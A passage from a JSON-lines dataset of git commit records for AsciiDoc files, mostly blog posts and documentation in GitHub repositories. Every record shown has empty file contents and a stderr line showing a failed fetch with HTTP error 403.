rm\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch,yynil\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,xuzha\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,JervyShi\/elasticsearch,jchampion\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,palecur\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,markwalkom\/elasticsearch,mikemccand\/elasticsearch,jbertouch\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra5-rc,i-am-Nathan\/elasticsearch,geidies\/elasticsearch,clintongormley\/elasticsearch,wenpos\/elasticsearch,diendt\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,myelin\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,obourgain\/elasticsearch,xuzha\/elasticsearch,sreeramjayan\/elasticsearch,JSCooke\/elasticsearch,nomoa\/elasticsearch,myelin\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,jchampion\/elasticsearch,davidvgalbraith\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,awislowski\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,mapr\/elasticsearch,sreeramjayan\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,avikurapati\/elasticsearch,tebriel\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra5-rc,trangvh\/elasticsearch,IanvsPoplicola\/elasticsearch,yynil\/elasticsearch,mmaracic\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,mapr\/elasticsearch,yanjunh\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,davidvgalbraith\/elasticsearch,LewayneNaidoo\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,davidvgalbraith\/elasticsearch,mapr\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,geidies\/elasticsearch,trangvh\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,jchampion\/elasticsearch,episerver\/elasticsearch,trangvh\/elasticsearch,Stacey-Gammon\/elasticsearch,myelin\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,davidvgalbraith\/elasticsearch,JackyMai\/elasticsearch,JervyShi\/elasticsearch,davidvgalbraith\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,camilojd\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra5-rc,xuzha\/elasticsearch,spiegela\/elasticsearch,dpursehouse\/elasticsearch,vroyer\/elasticassandra,obourgain\/elasticsearch,pozhidaevak\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,avikurapati\/elasticsearch,xuzha\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,nomoa\/elasticsearch,jbertouch\/elasticsearch,qwerty4030\/elasticsearch,sreeramjayan\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,avikurapati\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,MaineC\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,rlugojr\/elasticsearch,zkidkid\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,ESamir\/elasticsearch,liweinan0423\/elasticsearch,yynil\/elasticsearch,nomoa\/elasticsearch,spiegela\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,dpursehouse\/elasticsearch,artnowo\/elasticsearch,vroyer\/elasticassandra,alexshadow007\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,nomoa\/elasticsearch,elasticdog\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,Helen-Zhao\/elasticsearch,yynil\/elasticsearch,markharwood\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,camilojd\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elassandra,jbertouch\/elasticsearch,strapdata\/elassandra,ESamir\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,cwurm\/elasticsearch,artnowo\/elasticsearch,episerver\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,tebriel\/elasticsearch,henakamaMSFT\/elasticsearch,umeshdangat\/elasticsearch,HonzaKral\/elasticsearch,zkidkid\/elasticsearch,jprante\/elasticsearch,nilabhsagar\/elasticsearch,mapr\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,xuzha\/elasticsearch,wuranbo\/elasticsearch,ricardocerq\/elasticsearch,awislowski\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,zkidkid\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,dongjoon-hyun\/elasticsearch,glefloch\/elasticsearch,nilabhsagar\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,clintongormley\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,diendt\/elasticsearch,wuranbo\/elasticsearch,markwalkom\/elasticsearch,jbertouch\/elasticsearch,zkidkid\/elasticsearch,glefloch\/elasticsearch,awislowski\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,yynil\/elasticsearch,StefanGor\/elasticsearch,tebriel\/elasticsearch,mortonsykes\/elasticsearch,jchampion\/elasticsearch,fforbeck\/elasticsearch,robin13\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,tebriel\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,mjason3\/elasticsearch,mikemccand\/elasticsearch,girirajsharma\/elasticsearch,sreeramjayan\/elasticsearch,avikurapati\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elassandra,elasticdog\/elasticsearch,tebriel\/elasticsearch,glefloch\/elasticsearch,clintongormley\/elasticsearch","old_file":"docs\/plugins\/repository.asciidoc","new_file":"docs\/plugins\/repository.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe5e30c04eb7360ce562c62632c25836fa527841","subject":"y2b create post Sony MDR-XB500 Unboxing \\u0026 Overview","message":"y2b create post Sony MDR-XB500 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-21-Sony-MDRXB500-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-21-Sony-MDRXB500-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"783cf39b4355ae63e24f57c7a2ee84871cbee40c","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c31fa81a8604564d4afd2612261738600d1d8a4","subject":"Update 2015-07-09-Markdown-test.adoc","message":"Update 2015-07-09-Markdown-test.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-09-Markdown-test.adoc","new_file":"_posts\/2015-07-09-Markdown-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8930ee94df8adb08efb93cd4f6a6f69fcdf22d56","subject":"Update 2017-03-12-My-English-Title.adoc","message":"Update 2017-03-12-My-English-Title.adoc","repos":"deformat\/deformat.github.io,deformat\/deformat.github.io,deformat\/deformat.github.io,deformat\/deformat.github.io","old_file":"_posts\/2017-03-12-My-English-Title.adoc","new_file":"_posts\/2017-03-12-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deformat\/deformat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f736f82030203c3da73994186abd0c3e5860638","subject":"Update 2018-07-13-I-will-be-Vimmer.adoc","message":"Update 2018-07-13-I-will-be-Vimmer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efe8be547a147d0bddeddc3de4b65ed0c694fb23","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"644c36cd746673101bbbe11daf28f0a7c1aac8d3","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ab3b538db2eceaddcc8079a1a4ab3e58460b201","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61fe8dbcb43c6533ea9b7eb0f39b6e62dc7ff278","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"840656d1dfba0c0565fc9628c59fe3a98b6c2617","subject":"Update 2019-03-21-consider-database.adoc","message":"Update 2019-03-21-consider-database.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-21-consider-database.adoc","new_file":"_posts\/2019-03-21-consider-database.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0fc5e4b548a840918f214fd66bf2f8686519221","subject":"Update index.adoc","message":"Update index.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/index.adoc","new_file":"_posts\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd1c60efb2e65ef2bffc61f2548aa652001141ff","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c8a5bc5561cb4f9c96748d6b66473f85de54bfe","subject":"Publish 2016-6-27-file-getput-contents.adoc","message":"Publish 2016-6-27-file-getput-contents.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-file-getput-contents.adoc","new_file":"2016-6-27-file-getput-contents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b79bca26c27265b40e5c00e4625118c250c327","subject":"Forget the intercept.adoc file","message":"Forget the intercept.adoc file\n","repos":"adessaigne\/camel,JYBESSON\/camel,sabre1041\/camel,adessaigne\/camel,oalles\/camel,YoshikiHigo\/camel,nboukhed\/camel,tdiesler\/camel,pkletsko\/camel,allancth\/camel,cunningt\/camel,tlehoux\/camel,Fabryprog\/camel,sverkera\/camel,mgyongyosi\/camel,anoordover\/camel,ssharma\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,christophd\/camel,bhaveshdt\/camel,sabre1041\/camel,jkorab\/camel,anton-k11\/camel,kevinearls\/camel,RohanHart\/camel,bhaveshdt\/camel,oalles\/camel,curso007\/camel,oalles\/camel,mgyongyosi\/camel,tkopczynski\/camel,onders86\/camel,jamesnetherton\/camel,christophd\/camel,tlehoux\/camel,chirino\/camel,driseley\/camel,drsquidop\/camel,yuruki\/camel,NickCis\/camel,DariusX\/camel,ullgren\/camel,nikhilvibhav\/camel,chirino\/camel,yuruki\/camel,apache\/camel,sirlatrom\/camel,tlehoux\/camel,apache\/camel,jmandawg\/camel,lburgazzoli\/camel,gnodet\/camel,sabre1041\/camel,rmarting\/camel,tadayosi\/camel,nboukhed\/camel,adessaigne\/camel,gnodet\/camel,pkletsko\/camel,alvinkwekel\/camel,snurmine\/camel,jlpedrosa\/camel,sirlatrom\/camel,YoshikiHigo\/camel,veithen\/camel,rmarting\/camel,jonmcewen\/camel,borcsokj\/camel,allancth\/camel,RohanHart\/camel,CodeSmell\/camel,alvinkwekel\/camel,bgaudaen\/camel,apache\/camel,sirlatrom\/camel,JYBESSON\/camel,apache\/camel,ssharma\/camel,bhaveshdt\/camel,borcsokj\/camel,onders86\/camel,pkletsko\/camel,scranton\/camel,gautric\/camel,curso007\/camel,onders86\/camel,cunningt\/camel,tlehoux\/camel,chirino\/camel,salikjan\/camel,allancth\/camel,mgyongyosi\/camel,veithen\/camel,jarst\/camel,kevinearls\/camel,alvinkwekel\/camel,sirlatrom\/camel,jmandawg\/camel,jamesnetherton\/camel,prashant2402\/camel,neoramon\/camel,prashant2402\/camel,pax95\/camel,anoordover\/camel,driseley\/camel,tadayosi\/camel,pkletsko\/camel,acartapanis\/camel,scranton\/camel,neoramon\/camel,ssharma\/camel,rmarting\/camel,sverkera\/camel,nikvaessen\/camel,ullgren\/camel,pax95\/camel,bgaudaen\/camel,nicolaferraro\/camel,hqstevenson\/camel,Thopap\/camel,sabre1041\/camel,anoordover\/camel,anoordover\/camel,sverkera\/camel,neoramon\/camel,mcollovati\/camel,neoramon\/camel,drsquidop\/camel,cunningt\/camel,bgaudaen\/camel,gilfernandes\/camel,alvinkwekel\/camel,gautric\/camel,curso007\/camel,jarst\/camel,nboukhed\/camel,jkorab\/camel,jonmcewen\/camel,mcollovati\/camel,mgyongyosi\/camel,pkletsko\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,jarst\/camel,lburgazzoli\/apache-camel,nikvaessen\/camel,pmoerenhout\/camel,kevinearls\/camel,scranton\/camel,adessaigne\/camel,yuruki\/camel,isavin\/camel,lburgazzoli\/camel,ssharma\/camel,nboukhed\/camel,bgaudaen\/camel,davidkarlsen\/camel,pmoerenhout\/camel,tdiesler\/camel,hqstevenson\/camel,hqstevenson\/camel,jlpedrosa\/camel,gnodet\/camel,bhaveshdt\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,pax95\/camel,rmarting\/camel,anton-k11\/camel,jkorab\/camel,driseley\/camel,jmandawg\/camel,christophd\/camel,JYBESSON\/camel,veithen\/camel,drsquidop\/camel,FingolfinTEK\/camel,jlpedrosa\/camel,mcollovati\/camel,w4tson\/camel,YoshikiHigo\/camel,rmarting\/camel,adessaigne\/camel,jkorab\/camel,sabre1041\/camel,ssharma\/camel,kevinearls\/camel,bgaudaen\/camel,anoordover\/camel,acartapanis\/camel,onders86\/camel,prashant2402\/camel,jonmcewen\/camel,gilfernandes\/camel,objectiser\/camel,RohanHart\/camel,gautric\/camel,zregvart\/camel,hqstevenson\/camel,akhettar\/camel,acartapanis\/camel,oalles\/camel,pmoerenhout\/camel,tkopczynski\/camel,anton-k11\/camel,tdiesler\/camel,jamesnetherton\/camel,anoordover\/camel,apache\/camel,lburgazzoli\/apache-camel,chirino\/camel,akhettar\/camel,sirlatrom\/camel,JYBESSON\/camel,ullgren\/camel,drsquidop\/camel,NickCis\/camel,YoshikiHigo\/camel,nikvaessen\/camel,RohanHart\/camel,jkorab\/camel,nikhilvibhav\/camel,jmandawg\/camel,akhettar\/camel,pax95\/camel,jkorab\/camel,DariusX\/camel,jlpedrosa\/camel,sabre1041\/camel,yuruki\/camel,dmvolod\/camel,scranton\/camel,ullgren\/camel,dmvolod\/camel,cunningt\/camel,allancth\/camel,borcsokj\/camel,nikhilvibhav\/camel,driseley\/camel,oalles\/camel,bhaveshdt\/camel,onders86\/camel,christophd\/camel,davidkarlsen\/camel,neoramon\/camel,neoramon\/camel,Thopap\/camel,pax95\/camel,tdiesler\/camel,nboukhed\/camel,NickCis\/camel,prashant2402\/camel,veithen\/camel,isavin\/camel,NickCis\/camel,Thopap\/camel,snurmine\/camel,zregvart\/camel,nicolaferraro\/camel,dmvolod\/camel,sverkera\/camel,punkhorn\/camel-upstream,dmvolod\/camel,pax95\/camel,driseley\/camel,borcsokj\/camel,Fabryprog\/camel,chirino\/camel,lburgazzoli\/apache-camel,gilfernandes\/camel,jonmcewen\/camel,cunningt\/camel,tdiesler\/camel,prashant2402\/camel,Thopap\/camel,isavin\/camel,NickCis\/camel,isavin\/camel,apache\/camel,jmandawg\/camel,DariusX\/camel,davidkarlsen\/camel,FingolfinTEK\/camel,nikvaessen\/camel,tkopczynski\/camel,prashant2402\/camel,gilfernandes\/camel,objectiser\/camel,snurmine\/camel,isavin\/camel,dmvolod\/camel,jarst\/camel,punkhorn\/camel-upstream,bhaveshdt\/camel,allancth\/camel,jonmcewen\/camel,nicolaferraro\/camel,yuruki\/camel,cunningt\/camel,tadayosi\/camel,hqstevenson\/camel,anton-k11\/camel,isavin\/camel,jamesnetherton\/camel,FingolfinTEK\/camel,tlehoux\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,salikjan\/camel,drsquidop\/camel,w4tson\/camel,nboukhed\/camel,jarst\/camel,lburgazzoli\/apache-camel,gautric\/camel,allancth\/camel,tkopczynski\/camel,objectiser\/camel,akhettar\/camel,CodeSmell\/camel,RohanHart\/camel,pmoerenhout\/camel,tlehoux\/camel,tadayosi\/camel,acartapanis\/camel,scranton\/camel,gautric\/camel,gautric\/camel,zregvart\/camel,acartapanis\/camel,curso007\/camel,zregvart\/camel,mgyongyosi\/camel,snurmine\/camel,JYBESSON\/camel,lburgazzoli\/apache-camel,FingolfinTEK\/camel,curso007\/camel,YoshikiHigo\/camel,w4tson\/camel,rmarting\/camel,curso007\/camel,christophd\/camel,jarst\/camel,kevinearls\/camel,lburgazzoli\/camel,veithen\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,nicolaferraro\/camel,snurmine\/camel,akhettar\/camel,veithen\/camel,adessaigne\/camel,gnodet\/camel,nikvaessen\/camel,dmvolod\/camel,JYBESSON\/camel,w4tson\/camel,mgyongyosi\/camel,tadayosi\/camel,sirlatrom\/camel,sverkera\/camel,DariusX\/camel,Fabryprog\/camel,oalles\/camel,driseley\/camel,borcsokj\/camel,tkopczynski\/camel,lburgazzoli\/camel,lburgazzoli\/camel,jlpedrosa\/camel,objectiser\/camel,chirino\/camel,jonmcewen\/camel,bgaudaen\/camel,NickCis\/camel,RohanHart\/camel,jlpedrosa\/camel,gnodet\/camel,akhettar\/camel,tdiesler\/camel,nikvaessen\/camel,pkletsko\/camel,Thopap\/camel,FingolfinTEK\/camel,CodeSmell\/camel,yuruki\/camel,snurmine\/camel,jmandawg\/camel,sverkera\/camel,ssharma\/camel,borcsokj\/camel,anton-k11\/camel,FingolfinTEK\/camel,Thopap\/camel,w4tson\/camel,Fabryprog\/camel,hqstevenson\/camel,jamesnetherton\/camel,mcollovati\/camel,lburgazzoli\/camel,scranton\/camel,CodeSmell\/camel,gilfernandes\/camel,drsquidop\/camel,w4tson\/camel,YoshikiHigo\/camel,tadayosi\/camel,onders86\/camel,gilfernandes\/camel,anton-k11\/camel,christophd\/camel","old_file":"docs\/user-manual\/en\/intercept.adoc","new_file":"docs\/user-manual\/en\/intercept.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22f3f8de6bb40a1eaf6527976b1a2b4127eeb80e","subject":"LIVEOAK-246: intial creation of UPS docs. Still a work in progress.","message":"LIVEOAK-246: intial creation of UPS docs. Still a work in progress.\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"docs\/ups.adoc","new_file":"docs\/ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"38bbfcea3ae99f39920b70d20f32e7b98cccc7f6","subject":"Update 2019-01-13-Golang.adoc","message":"Update 2019-01-13-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-Golang.adoc","new_file":"_posts\/2019-01-13-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bd425eab483ffb01ef4a7f144e12586c77a2581","subject":"Update 2018-05-21-My-post.adoc","message":"Update 2018-05-21-My-post.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-05-21-My-post.adoc","new_file":"_posts\/2018-05-21-My-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3fa39fcdc12ca23508c8b8556c384064b9dd3c","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6438e6f50a250be415ca61c9853960ff6731014b","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"ProgrammingRobotsStudyGroup\/RoboHead,ProgrammingRobotsStudyGroup\/RoboHead","old_file":"html\/README.asciidoc","new_file":"html\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ProgrammingRobotsStudyGroup\/RoboHead.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e2e69547976f6a59013f690c36a2501ed384edc","subject":"Formatting","message":"Formatting\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Null.adoc","new_file":"Best practices\/Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4d6f539cef347bf1f9b7dcf4873d44d270b311d","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a9eb5b72e361bc6c1b0bf56c4e7251c9cc7935b","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 